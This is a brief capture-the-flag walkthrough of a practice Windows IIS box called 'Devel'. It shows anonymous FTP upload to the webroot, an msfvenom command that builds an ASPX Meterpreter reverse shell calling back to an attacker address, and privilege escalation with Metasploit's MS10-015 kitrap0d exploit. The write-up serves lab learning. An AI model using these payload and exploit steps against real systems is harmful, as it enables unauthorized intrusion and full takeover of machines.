Devel

Port Scanning and General Enumeration (Nmap)

Initial scan shows ports 21 (FTP) and 80 (HTTP) open.

The targeted scan shows that anonymous FTP login is allowed, and the FTP root looks like the webroot.

Logging in to FTP with the creds anonymous:anonymous, we can put a file and see if we can access it from the browser. I wrote a simple htm file that says nice.

Access (FTP, Metasploit, msfvenom)

Things we know:

  • We can access a file that we place on the FTP server
  • We’re working with Microsoft IIS so we’ll probably need an asp or aspx file

Let’s craft some shellcode using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4444 -f aspx > shell.aspx

Set up a listener in Metasploit and access our shell in the browser:

http://10.10.10.5/shell.aspx

and…

Privesc (Metasploit, MS10-015)

Well, we’re on the box, but as a low-privilege account. Let’s change that. Background the shell (bg) and:

use post/multi/recon/local_exploit_suggester

Looks like there are a few we can try. Let’s try kitrap0d:

use exploit/windows/local/ms10_015_kitrap0d

Make sure your settings are correct and fire it off.

That’s a better account! Capture the flags.